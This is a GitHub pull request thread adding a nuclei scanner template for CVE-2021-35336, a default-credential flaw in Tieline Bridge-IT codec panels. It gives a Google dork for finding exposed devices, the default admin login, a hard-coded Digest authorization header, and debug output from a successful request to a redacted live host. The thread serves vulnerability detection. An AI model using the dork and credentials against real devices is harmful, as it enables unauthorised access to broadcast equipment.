.\Tieline\Tieline.yaml
projectdiscovery/nuclei-templates pull request #2080
Opened 2021-07-18 20:37 UTC by pratikkhalane

### Template / PR Information

-   Add **CVE-2021-35336**

-  References:  [](https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c)

### Template Validation

I've validated this template locally?

- [ ] YES

### Additional Details: 

Google Dork :  intext:2.6.4.8 - © 2019 tieline pty ltd

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

2021-07-19 12:15 UTC, toufik-airane requested changes
Dear @pratikkhalane,

Please find comments to address.

Thanks.

2021-07-19 12:15 UTC, toufik-airane commented on default-logins/Tieline/Tieline.yaml
> +#Password - password
Can you justify or clean up this existing code?

2021-07-19 12:15 UTC, toufik-airane commented on default-logins/Tieline/Tieline.yaml
> +      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00
Can you give more context about the nonce and the cnonce hard coded value?

2021-07-19 12:38 UTC, pratikkhalane commented on default-logins/Tieline/Tieline.yaml
> +#Password - password
This is just to give a reference of what are the default credentials for the people to read.

2021-07-19 16:07 UTC, toufik-airane commented on default-logins/Tieline/Tieline.yaml
> +      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00
After investigation, you have to follow the authentication flow dictated by the server.
https://en.wikipedia.org/wiki/Digest_access_authentication (read the Example with explanation)

The Digest Authorization is not a one-way workflow like the Basic Authorization.
Unfortunately, the authentication flow requires extracting the WWW-Authenticate specified by the server.

cc @pratikkhalane @ehsandeep

2021-07-19 20:54 UTC, toufik-airane commented
After investigation, we have to deal with an HTTP digest access authentication.
It requires further capabilities with the Nuclei engine.
Please take a look at the issue https://github.com/projectdiscovery/nuclei/issues/847.

We will keep you up to date to address this template.

2021-08-04 17:34 UTC, toufik-airane approved these changes
@princechaddha I've tested on a bunch of hosts and I confirm it works! 👍

2021-08-04 18:26 UTC, pratikkhalane commented
Thank you😀

On Wed, Aug 4, 2021, 10:10 PM Prince Chaddha ***@***.***>
wrote:

> Hello @pratikkhalane <https://github.com/pratikkhalane> @toufik-airane
> <https://github.com/toufik-airane>, I was able to validate this template.
> A really nice template for a First-time contributor. Thanks for your
> contribution @pratikkhalane <https://github.com/pratikkhalane> 🎉
>
> Debug output:
>
> GET /api/get_device_details HTTP/1.1
>
> Host: <redacted>:80
>
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
>
> Connection: close
>
> Accept: */*
>
> Accept-Language: en
>
> Authorization: Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"
>
> Referer: http://<redacted>:80/assets/base/home.html
>
> Accept-Encoding: gzip
>
>
>
> [INF] [Tieline-default-credentials] Dumped HTTP response for http://<redacted>:80/api/get_device_details
>
>
>
> HTTP/1.1 200 OK
>
> Connection: close
>
> Transfer-Encoding: chunked
>
> Content-Type: text/xml
>
> Date: Sun, 27 Jun 2021 15:36:00 GMT
>
> Server: Tieline
>
>
>
> <?xml version="1.0"?>
>
> <result request="get_device_details">
>
> <BOOTTIME>1624513416</BOOTTIME>
>
> <BRANCH>v2_14</BRANCH>
>
> <BUILD>Dec 8 2015 06:30:10</BUILD>
>
> <CODEC_NAME>Unnamed Codec</CODEC_NAME>
>
> <FEATURES></FEATURES>
>
> <HW_REVISION>3</HW_REVISION>
>
> <MODEL>TLB5100</MODEL>
>
> <PLATFORM>Bridge_IT</PLATFORM>
>
> <PLATFORM_SUBTYPE>Unknown</PLATFORM_SUBTYPE>
>
> <PRODUCT>Bridge-IT</PRODUCT>
>
> <PRODUCT_CODE>TLB5100</PRODUCT_CODE>
>
> <SERIAL>34156</SERIAL>
>
> <UPTIME_SEC>294808</UPTIME_SEC>
>
> <VERSION>v2.14.100</VERSION>
>
> </result>
>
>
>
>
> —
> You are receiving this because you were mentioned.
> Reply to this email directly, view it on GitHub
> <https://github.com/projectdiscovery/nuclei-templates/pull/2080#issuecomment-892807541>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/AMQYYIQI6VK5SJECUA2M44DT3FUQ3ANCNFSM5ASPJBAQ>
> .
>

2021-08-04 18:35 UTC, merged